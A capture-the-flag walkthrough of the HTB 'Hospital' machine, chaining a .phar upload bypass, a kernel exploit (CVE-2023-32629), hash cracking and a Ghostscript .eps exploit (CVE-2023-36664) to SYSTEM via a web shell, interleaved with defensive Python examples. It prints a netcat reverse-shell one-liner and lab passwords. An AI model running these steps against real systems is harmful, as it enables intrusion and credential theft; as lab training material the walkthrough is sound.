HTB Hospital: Walkthrough
Our attack on the target begins with a file upload vulnerability that lets us upload a .phar file and gain RCE on the target. This is followed by exploitation of CVE-2023-32629 due to a vulnerable kernel version, giving us SSH access to the target. We then use our access on the machine to extract and crack a user's password from /etc/shadow, and check for password reuse on an additional web server that is vulnerable to CVE-2023-36664, giving us access to the host machine. Finally, we use the web server, which runs as SYSTEM, to host our own .php web shell file, rooting the machine.
0) Machine Overview
1) Scans
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
6404/tcp open boe-filesvr
6406/tcp open boe-processsvr
6407/tcp open boe-resssvr1
6409/tcp open boe-resssvr3
6617/tcp open unknown
6640/tcp open ovsdb
8080/tcp open http
9389/tcp open adws
Seems like there are quite a few junk ports, but there is a web server running on 8080.
Enum4Linux:
Looks like we’re dealing with an AD machine.
2) Web Enumeration
443 HTTPS:
8080 HTTP:
Let's start with the 8080 web server, as the one on 443 doesn't look too promising at the moment. I'll be running a gobuster scan on both web servers in the background.
We’ll first create a user and see what kind of things we have access to.
In this case, we have a file upload form. We can try uploading a random image and see if we can find out where it gets stored.
If we run gobuster, we notice an /uploads directory:
If we access /uploads directly, we get a 403 Forbidden. However, if we request the full path, assuming our file got stored there, we can access it:
In this case, let's try uploading various file extensions using Intruder and see what's accepted and what isn't:
As we can see, most of our options for executing any kind of code seem limited. However, if we research which file extensions can potentially execute PHP code, .phar is a possibility, and if we take a look at our Intruder output, .phar is actually accepted.
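The Intruder results above are what an extension blocklist looks like from the outside: .php is refused, .phar is not. As an added example (not code from the target application, whose PHP is not on the page), this Python model puts that weak blocklist check next to an allowlist check that also rejects double extensions and path components:

```python
import os
import re

# Blocklist of the kind the upload form appears to use: it rejects the obvious
# PHP extensions but not .phar, which the server's PHP handler still executes.
# (Constructed to mirror the Intruder results; the real form's code is not on the page.)
BLOCKLIST = {"php", "php3", "php4", "php5", "phtml"}

# Hardened check: a single allowlisted image extension on a plain basename,
# so "shell.php.png", "shell.phar" and path-traversal names all fail.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)$", re.IGNORECASE)


def blocklist_accepts(filename: str) -> bool:
    """The weak check: take the last extension and compare it against the blocklist."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return ext not in BLOCKLIST


def allowlist_accepts(filename: str) -> bool:
    """The hardened check: reject path components, then require an allowlisted name."""
    if os.path.basename(filename) != filename:
        return False
    return SAFE_NAME.fullmatch(filename) is not None


def audit(filenames):
    """Names the blocklist lets through that the allowlist would reject."""
    return [f for f in filenames if blocklist_accepts(f) and not allowlist_accepts(f)]


if __name__ == "__main__":
    samples = ["avatar.png", "shell.php", "shell.PhP", "shell.phar", "shell.php.png", "../x.png"]
    for name in samples:
        print(f"{name:14} blocklist={blocklist_accepts(name)!s:5} allowlist={allowlist_accepts(name)}")
    # Expected: shell.phar, shell.php.png and ../x.png slip past the blocklist only.
    print("slipped past blocklist:", audit(samples))
```

Pair the allowlist with storage outside the web root, or a server config that never executes files under /uploads, since the name check alone does not stop a stored file from being served as code.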
Let's try uploading a simple web shell first to see if this will actually work.
So the file actually uploaded, but when I try to run any commands, the page just returns a blank white page. Let's try a full-fledged reverse shell, the one by PentestMonkey.
Doesn’t work either, but at least we know our file is being executed.
I eventually came across p0wny-shell which gives an extremely interesting web-shell, and works perfectly.
3) Privilege Escalation
Now, if we recall, our port scans showed that this was a Windows machine. However, in our current situation, we're on:
Time to look around and see what we can find and do.
First off, I was able to find some MySQL DB credentials in config.php:
root:my$qls3rv1c3!
To actually access the DB, we'll need a proper shell. Let's upgrade our shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5555 >/tmp/f
Once the shell is caught, I like to run export TERM=xterm and python3 -c 'import pty;pty.spawn("/bin/bash")' to make sure my shell is nice and stable with proper I/O handling.
So we have 2 hashes now, the 3rd obviously belonging to our user. Let's try cracking them, although they are bcrypt hashes.
Admin’s Hash:
Patient’s Hash:
They seem quite useless.
After a while, I decided to check whether the kernel version was vulnerable, as I had originally discarded that idea. It turns out it actually is, to CVE-2023-32629:
With a very easy-to-use PoC, we can quickly run this exploit.sh script and escalate:
Let's get a stable SSH connection now.
4) Web Enumeration 2
First, I decided to enumerate drwilliams' home directory a bit, and also took their hash and cracked it offline, hoping I could use the plaintext on SMB or LDAP.
Yessir.
Could only connect to SYSVOL, didn’t find much in there.
Let's try those credentials on the other web application:
If we read the email, he mentions something about .eps file extensions and "GhostScript".
I didn’t know what either of those were, so I made a quick google search, and to my surprise:
From the description of the PoC, we can see this exploit happens when GhostScript opens a .eps file and mishandles permission validation, giving us RCE.
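The permission validation that CVE-2023-36664 mishandles is Ghostscript's check on pipe devices (the %pipe% prefix), and the fix shipped in Ghostscript 10.01.2 per the vendor's release notes. As an added example (not from the page or the PoC it links), this Python triage routine for a mail gateway flags EPS attachments that reference a pipe device and quarantines the rest when the installed renderer is older than the fix; the sample files and the version strings are constructed:

```python
import re

# Ghostscript fixed the %pipe% permission check in 10.01.2 (CVE-2023-36664);
# older builds that render untrusted EPS/PS input are exposed.
FIXED_VERSION = (10, 1, 2)

# A PostScript string literal that names a pipe device: "(%pipe%..." or "(|...".
# Legitimate EPS artwork sent by e-mail has no reason to reference one.
PIPE_DEVICE = re.compile(rb"\(\s*(?:%pipe%|\|)", re.IGNORECASE)

# Constructed samples, not files from the box.
BENIGN_EPS = b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n0 0 100 100 rectfill\nshowpage\n"
SUSPECT_EPS = b"%!PS-Adobe-3.0 EPSF-3.0\n(%pipe%PLACEHOLDER) pop\nshowpage\n"


def parse_version(text: str) -> tuple:
    """Pull the first dotted version out of `gs --version` output, e.g. '10.01.1' -> (10, 1, 1)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError("no Ghostscript version found")
    return tuple(int(part or 0) for part in m.groups())


def is_vulnerable_version(version_text: str) -> bool:
    return parse_version(version_text) < FIXED_VERSION


def pipe_device_offsets(data: bytes) -> list:
    """Byte offsets of every pipe-device reference in an EPS/PS body."""
    return [m.start() for m in PIPE_DEVICE.finditer(data)]


def triage_eps(data: bytes, version_text: str) -> str:
    """Decide what a mail gateway should do with an EPS attachment."""
    if not data.startswith(b"%!PS"):
        return "reject: not a PostScript/EPS file"
    offsets = pipe_device_offsets(data)
    if offsets:
        return f"reject: pipe-device reference at offset(s) {offsets}"
    if is_vulnerable_version(version_text):
        return "quarantine: renderer is older than 10.01.2, open only in a sandbox"
    return "allow"


if __name__ == "__main__":
    for label, eps in (("benign", BENIGN_EPS), ("suspect", SUSPECT_EPS)):
        print(label, "->", triage_eps(eps, "GPL Ghostscript 10.01.1"))
```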
Let's give it a try:
Reply back to drbrown with the file attached, and voila:
Now to execute it:
5) Privilege Escalation 2
At first, I tried uploading SharpHound.exe and loading its data into BloodHound to see if there was a path from drbrown to Domain Admin. Unfortunately there wasn't, so I had to resort to some manual enumeration:
I checked out the ghostscript.bat file that was located in our user's Documents directory, and found his password:
chr!$br0wn
Why don’t we try RDP’ing into the machine now?
Now that we're connected, let's check Task Manager. We'll notice the web server that's running.
We can check the Properties of the executable that's running the service. We can see that it's httpd.exe.
Well… what if that web server is running in the context of Administrator or SYSTEM? We could try uploading our own file, then access it and get a shell in that context. And that is exactly the case in this scenario, as we see if we run tasklist /V:
(Note: typically, we could have just run tasklist /V within our shell without having to RDP. However, I was unable to run it there for some reason.)
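The tasklist /V finding is the whole privilege-escalation story here: a network-facing httpd.exe running as SYSTEM. As an added example (not from the page), this Python audit parses the CSV form of the same command, tasklist /V /FO CSV, and flags network-facing processes that run as SYSTEM or Administrator; the listing below is constructed, not the box's real output:

```python
import csv
import io

# Constructed sample of `tasklist /V /FO CSV` output (not the box's real listing).
TASKLIST_CSV = """\
"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"httpd.exe","1234","Services","0","20,000 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:01","N/A"
"httpd.exe","1240","Services","0","30,000 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:02","N/A"
"mysqld.exe","1300","Services","0","90,000 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:05","N/A"
"explorer.exe","2000","RDP-Tcp#1","2","60,000 K","Running","HOSPITAL\\drbrown","0:00:10","N/A"
"svchost.exe","800","Services","0","10,000 K","Unknown","NT AUTHORITY\\NETWORK SERVICE","0:00:00","N/A"
"""

# Binaries that accept network or user-supplied input; none of them needs SYSTEM.
NETWORK_FACING = {"httpd.exe", "nginx.exe", "mysqld.exe", "w3wp.exe", "tomcat9.exe", "php-cgi.exe"}


def parse_tasklist(csv_text: str) -> list:
    """Parse tasklist's CSV form into one dict per process, keyed by the header row."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def is_high_privilege(user_name: str) -> bool:
    """SYSTEM, or any account literally named Administrator in any domain."""
    _, _, account = user_name.rpartition("\\")
    return user_name.upper() == "NT AUTHORITY\\SYSTEM" or account.lower() == "administrator"


def flag_privileged_services(rows) -> list:
    """(image, pid, user) for every network-facing process running with high privilege."""
    findings = []
    for row in rows:
        image = row["Image Name"]
        if image.lower() in NETWORK_FACING and is_high_privilege(row["User Name"]):
            findings.append((image, int(row["PID"]), row["User Name"]))
    return findings


if __name__ == "__main__":
    for image, pid, user in flag_privileged_services(parse_tasklist(TASKLIST_CSV)):
        print(f"{image} (PID {pid}) runs as {user}: move it to a dedicated service account")
```

On a real host, save the output of tasklist /V /FO CSV to a file and pass its text to parse_tasklist; for XAMPP the remediation is to run the Apache service under a low-privilege account and keep htdocs non-writable to the accounts that web applications or interactive users run as.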
A quick ChatGPT query tells us that in XAMPP, the web server files are typically stored in the "htdocs" directory.
So now we'll upload a file into C:/xampp/htdocs and then access it via the URL.
Pwned.